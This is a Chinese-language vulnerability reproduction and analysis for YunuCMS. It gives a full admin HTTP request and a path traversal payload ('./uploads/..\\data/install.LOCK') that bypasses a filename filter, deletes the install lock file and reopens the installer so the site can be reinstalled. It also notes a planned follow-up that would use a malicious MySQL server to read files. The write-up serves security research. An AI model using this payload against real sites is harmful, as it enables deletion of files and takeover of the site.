漏洞复现
官网:http://www.yunucms.com/code/fenzhan/
源码下载地址:http://www.yunucms.com/download/citycode/
下载源码后在本地搭建,登录后台
data:image/s3,"s3://crabby-images/9bbd6/9bbd66ffd6b52de6c99690cf6d74b154cf382384" alt="fhkON6.png"
安装锁install.lock文件位于./data目录下
data:image/s3,"s3://crabby-images/81c72/81c7203479af620f2570d666d2f756e3db401a45" alt="fhk7u9.png"
发送数据包
1
| http://localhost/index.php?s=/admin/upload/delfile
|
data:image/s3,"s3://crabby-images/66850/668501fcd48e0650a8916f9de9d1fe5c94216b2c" alt="fhkLAx.png"
成功删除文件
data:image/s3,"s3://crabby-images/5df69/5df697cbe4aad96cb58d1a7ef85d1f36b9ef4453" alt="fhkX4K.png"
数据包
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
| POST /index.php?s=/admin/upload/delfile HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 50 Connection: close Referer: http://localhost/ Cookie: cookieconsent_status=dismiss; Hm_lvt_c12f88b5c1cd041a732dea597a5ec94c=1609381035; bdshare_firstime=1609381035017; Hm_lvt_d6ceebbfea56af954e58ccea336c10d8=1612666019,1614563564; UM_distinctid=177fbd5550c31-0aacb8a3b601b4-4c3f227c-1fa400-177fbd5550d5d8; CNZZDATA1277972876=1856010917-1614837798-%7C1614837798; Hm_lvt_b60316de6009d5654de7312f772162be=1621413156,1621496582; KCFINDER_showname=on; KCFINDER_showsize=off; KCFINDER_showtime=off; KCFINDER_order=name; KCFINDER_orderDesc=off; KCFINDER_view=thumbs; KCFINDER_displaySettings=off; PHPSESSID=qmauv143mirkico0dfo1pemdog Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: cross-site
filename=.%2Fuploads%2F..%5C%5Cdata%2Finstall.LOCK
|
再次访问网站首页,成功进入安装界面,此时可以覆盖安装
data:image/s3,"s3://crabby-images/2c0ed/2c0ed05338399aa000cee1f42bd349ccd362d2dd" alt="fhkv9O.png"
安装过程中的账号验证可以填自己注册的,不会影响利用
data:image/s3,"s3://crabby-images/7ac8a/7ac8a5f2c83d3222f5cf6e3936b0d3839e7f6ec5" alt="fhkx3D.png"
漏洞分析
/app/admin/controller/Upload.php
delfile方法中调用了unlink删除文件,参数$filename可控,不过传入的参数先经过了checkfileok函数过滤
data:image/s3,"s3://crabby-images/2e668/2e668753ce0e5abfed948206498b0cbc6059539e" alt="fhkbH1.png"
在checkfileok函数中,需要绕过三个if的判断
- 第一个in_array可以用大写后缀名绕过,仅在Windows下可用(WIndows文件不区分大小写)
- 过滤了
../
,可以用..\\
绕过
- 文件名必须包含
./uploads/
data:image/s3,"s3://crabby-images/2aa60/2aa606b8a0a7f6118270b68f0929d2da523a4ae7" alt="fhkHBR.png"
最后构造payload
1
| ./uploads/..\\data/install.LOCK
|
总结
本来想利用重装界面的数据库连接功能配合Mysql恶意服务端进行任意文件读取,但是试了几个工具都宣告失败,原因未知。